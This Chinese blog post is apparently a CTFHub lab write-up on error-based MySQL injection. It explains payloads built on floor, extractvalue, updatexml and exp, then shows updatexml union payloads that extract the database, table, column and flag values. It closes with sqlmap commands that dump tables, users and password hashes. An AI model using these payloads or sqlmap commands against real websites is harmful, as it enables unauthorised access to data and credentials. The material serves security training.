CTFHUB-技能树-Web题-SQL注入-报错注入_ctfhub技能树web报错型注入-优快云博客

本文链接：https://blog.youkuaiyun.com/Static______/article/details/137247172

技能树-Web题-SQL注入-报错注入

文章目录

- 技能树-Web题-SQL注入-报错注入

报错注入函数

loor函数

select count(*),(floor(rand(0)*2))x from table group by x;

select查询语句
group by进行分组（相同为一组）
rand()生成0到1的随机数
floor()返回整数
count()对数据整合（类似去重）

产生原因：mysql在执行该语句会建立一个虚拟表，表中有两个字段（一个是分组的值和一个计数的值），当分组已经存在后就会爆错。

参考：http://www.cnblogs.com/sfriend/p/11365999.html

extractvalue函数

限制长度为32位

and extractvalue(1,concat(0x7e,(select user()),0x7e));

该参数接受两个字符串参数，一个xml标记片段和一个xpath表达式，而第二参数要求xpath格式字符串，而我们不是所以报错。

参考：https://www.cnblogs.com/xishaonian/p/6250444.html

updatexml函数

限制长度为32位

and updatexml(1,concat(0x7e,(select user()),0x7e),1)

updatexml(1,2,3)第一个参数是string格式，为xml文档对象的名称，第二个参数为xpath格式的字符串，第三个string格式，替换查找到的符合条件的数据，由于第二个参数要xpath格式的字符串，因为不符合规则所以报错。

参考：http://blog.youkuaiyun.com/qq_37873738/article/details/88042610

name_const函数

只可获取数据库的版本信息

exp函数

exp(~(select * from(select user())a))

exp(int)该函数会返回值得x次方结果，当值超过mysql的范围就会爆错，上面payload的意思为：先查询user()的数据取名为a再select * from a将结果集a全部查询出来。

报错函数

报错函数：
floor()
extractvalue()
updatexml()
name_const()
join()
exp()
geometry collection()
polygon()
multipoint()
multlinestring()
multpolygon()
linestring()
参考：http://www.mamicode.com/info-detail-2366760.html

报错注入

判断注入点

输入1 查询到结果

在这里插入图片描述

尝试输入1‘ 出现报错

在这里插入图片描述

输入-1查询到结果

在这里插入图片描述

发现无论输入什么，都只会回显成功或者错误

能报错，说明存在注入点

爆库名

可以根据updatexml的报错注入来获取信息

1 union select 1,updatexml(1,concat(0x7e,(database()),0x7e),1)

updatexml (string, xpath_string, string)
第一个参数：可以输入1，为XML文档对象的名称
第二个参数：xpath_string ，提取多个子节点的文本
第三个参数：可以输入1，替换查找的符合条件的参数

0x7e是一个代表_{的十六进制，可以用’%’，或者’}’来代替

在这里插入图片描述

爆表名

1 union select 1,updatexml(1,concat(0x7e,(select (group_concat(table_name)) from information_schema.tables where table_schema='sqli'),0x7e),1)

在这里插入图片描述

爆列名

1 union select 1,updatexml(1,concat(0x7e,(select  (group_concat(column_name)) from information_schema.columns where  table_name='flag'),0x7e),1)

在这里插入图片描述

爆数据

1 union select 1,updatexml(1,concat(0x7e,(select (group_concat(flag)) from sqli.flag),0x7e),1)

在这里插入图片描述

自动化sqlmap注入

sqlmap注入

查询sqlmap是否存在注入命令
sqlmap.py -u url/?id=1

查询当前用户下的所有数据库
sqlmap.py -u url/?id=1 --dbs

获取数据库的表名
sqlmap.py -u url/?id=1 -D (数据库名) --tables

获取表中的字段名
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) --columns

获取字段的内容
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump

查询数据库的所有用户
sqlmap.py -u url/?id=1 --users

查询数据库的所有密码
sqlmap.py -u url/?id=1 --passwords

查询数据库名称
sqlmap.py -u url/?id=1 --current-db